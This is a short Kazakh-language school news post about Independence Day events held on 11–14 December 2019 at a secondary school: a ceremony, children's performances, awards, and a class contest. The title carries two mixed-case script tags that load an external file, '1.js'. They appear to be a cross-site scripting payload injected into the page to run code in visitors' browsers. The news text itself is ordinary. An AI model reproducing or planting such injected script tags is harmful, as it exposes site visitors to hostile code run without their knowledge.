Тұғыры биік Тәуелсіздік!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
14.12.2019
Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 11-14-желтоқсан күндері Тәуелсіздік мерекесіне арналған іс-шаралар жүргізілді. Мақсаты: Оқушылардың өткен тарихымызға деген ұлттық көзқарастарын қалыптастыру, оқушыларды елді, Отанын сүюге және егемен елімізді сақтауға және оны гүлдендіруге құштар патриоттық күш-қуаты мол жастарды тәрбиелеу.
11-желтоқсан күні салтанат залында тарих парақтарына көз жүгіртіп, желтоқсан құрбандарын еске алып, оқушылар өз өнерлерін ортаға салды. Ерекше жетістіктер көрсеткен ұстаздар, қызметкерлер мен оқушылар марапатталып, еңбектері бағаланды.
12-желтоқсан күні бастауыш сынып оқушылары мазмұны жағынан бай, әр оқушының жүрегінде есте қаларлықтай көріністер көрсетіп, көрермендерді таң қалдырды. Мерекелік бағдарлама әсем әндер мен тамаша билермен жалғасты.
13-желтоқсан күні сынып сағаттары мен 10-11 сыныптар арасында АӘД пәні бойынша сайыс өткізілді. Сайысқа 4 команда қатысып, нәтижесінде «Республика» мүшелері жеңіске жетті.
Омарова А.Б.